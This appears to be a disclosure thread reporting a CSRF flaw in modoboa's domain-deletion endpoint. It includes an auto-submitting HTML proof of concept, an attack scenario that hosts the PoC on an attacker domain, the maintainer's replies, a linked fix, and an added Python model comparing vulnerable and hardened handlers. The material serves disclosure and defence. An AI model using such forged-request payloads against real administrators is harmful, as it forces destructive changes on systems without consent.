CSRF leading to delete a domain in modoboa/modoboa
Reported on
Jan 14th 2023
Description
GET /admin/domains/{id}/delete/
page is vulnerable to a CSRF attack.
Proof of Concept
- Login as admin.
- Create a domain to be deleted. E.g. the domain ID is 4.
- Open the following file in the browser.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1:8000/admin/domains/4/delete/">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Impact
Admin would be forced to delete domains.
The repo's security policy is disabled but I found the maintainer's email: tonio@ngyn.org
https://github.com/tonioo
Hello, I'm the main maintainer of this project. Thank you for this report, but I'm not sure I understand why this is a security issue according to your description. If you stay on the same browser, and since we use sessions once a user is connected, we can say it is normal that an admin is allowed to delete a domain he created... Could you please tell me if I understand something in the wrong way? Thank you
Here is the scenario to exploit this issue:
Step 1. An attacker serves the HTML file in the Proof of Concept on http://attacker.tld/trap.html.
Step 2. The attacker sends the URL to the admin.
Step 3. The admin opens the URL and the domain specified by the attacker would get deleted.
As a result, the attacker can force the admin to delete any domains, so this is a security issue called CSRF.
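To make the scenario above concrete from the defender's side, here is an added, framework-free model (not code from the report or from modoboa) of the vulnerable pattern next to a hardened handler: the browser attaches the admin's session cookie to the cross-site form submission, so a GET endpoint that deletes on the strength of that cookie alone is forgeable, while requiring POST plus a session-bound token (named after Django's `csrfmiddlewaretoken` field here, an assumption about the fix) rejects the forged request. The `App`, `Request` and sample domain id 4 are constructed for illustration.

```python
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    """Constructed stand-in for an HTTP request: method, cookies the browser attaches, form body."""
    method: str
    cookies: dict
    form: dict = field(default_factory=dict)


class App:
    def __init__(self):
        self.domains = {4: "victim.tld"}   # constructed sample data: the domain from the PoC
        self.sessions = {}                 # sessionid -> {"user": ..., "csrf": ...}

    def login(self, user):
        sid = secrets.token_urlsafe(16)
        self.sessions[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
        return sid

    def delete_domain_vulnerable(self, req, domain_id):
        # Reported pattern: state change on GET, authorised by the session cookie alone.
        if req.cookies.get("sessionid") not in self.sessions:
            return 403
        self.domains.pop(domain_id, None)
        return 302

    def delete_domain_hardened(self, req, domain_id):
        sess = self.sessions.get(req.cookies.get("sessionid"))
        if sess is None:
            return 403
        if req.method != "POST":
            return 405                     # a link or GET form can no longer delete
        token = req.form.get("csrfmiddlewaretoken", "")
        if not hmac.compare_digest(token, sess["csrf"]):
            return 403                     # attacker.tld cannot read the admin's token
        self.domains.pop(domain_id, None)
        return 302


def cross_site_attempt(handler_name, method="GET"):
    """Admin is logged in; trap.html submits a form that carries the cookie but no token."""
    app = App()
    sid = app.login("admin")
    forged = Request(method=method, cookies={"sessionid": sid})
    return getattr(app, handler_name)(forged, 4), 4 in app.domains


def legitimate_attempt():
    """The admin's own page submits POST with the token rendered into the form."""
    app = App()
    sid = app.login("admin")
    req = Request("POST", {"sessionid": sid}, {"csrfmiddlewaretoken": app.sessions[sid]["csrf"]})
    return app.delete_domain_hardened(req, 4), 4 in app.domains
```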
@bAu Ok, I see. After a bit of research on my side, I finally understood how it could lead to a problem. I'm pushing a fix in a few minutes.
Here is the corresponding PR: https://github.com/modoboa/modoboa/pull/2752
@maintainer I'll check it later. Could you validate this report?
@maintainer I confirmed the vulnerability was fixed! Please mark this issue as fixed and request a CVE!